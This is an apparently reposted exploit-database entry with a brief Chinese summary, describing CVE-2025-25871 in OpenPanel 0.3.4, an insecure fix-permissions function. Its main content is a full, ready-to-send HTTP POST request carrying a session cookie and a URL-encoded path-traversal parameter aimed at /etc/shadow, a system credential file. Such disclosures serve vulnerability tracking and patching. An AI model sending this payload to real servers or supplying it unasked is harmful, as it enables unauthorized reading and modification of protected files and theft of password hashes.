OpenPanel 0.3.4 - Insecure Permission Modification via Fix Permission Function

OpenPanel 0.3.4 - Insecure Permission Modification via Fix Permission Function
OpenPanel 0.3.4 存在漏洞，修复权限功能允许不安全的权限修改。攻击者可构造恶意请求访问受限文件（如 /etc/shadow），影响 macOS 环境。 2025-3-8 17:47:35 Author: cxsecurity.com(查看原文) 阅读量:25 收藏

# Exploit Title: OpenPanel 0.3.4 - Insecure Permission Modification via Fix Permission Function # Date: Nov 7, 2024 # Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://openpanel.com/ # Software Link: https://openpanel.com/ # Version: 0.3.4 # Tested on: macOS # CVE : CVE-2025-25871 POST /fix-permissions HTTP/2 Host: demo.openpanel.org:2083 Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFuA.wDaUg0WYvBXvCQkEpxPwgcMeSpc User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://demo.openpanel.org:2083/fix-permissions Content-Type: application/x-www-form-urlencoded Content-Length: 102 Origin: https://demo.openpanel.org:2083 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers directory=%2Fhome%2Fstefan%2Fetc%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow

Thanks for you comment!
Your message is in quarantine 48 hours.

文章来源: https://cxsecurity.com/issue/WLB-2025030010
如有侵权请联系:admin#unsafe.sh

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.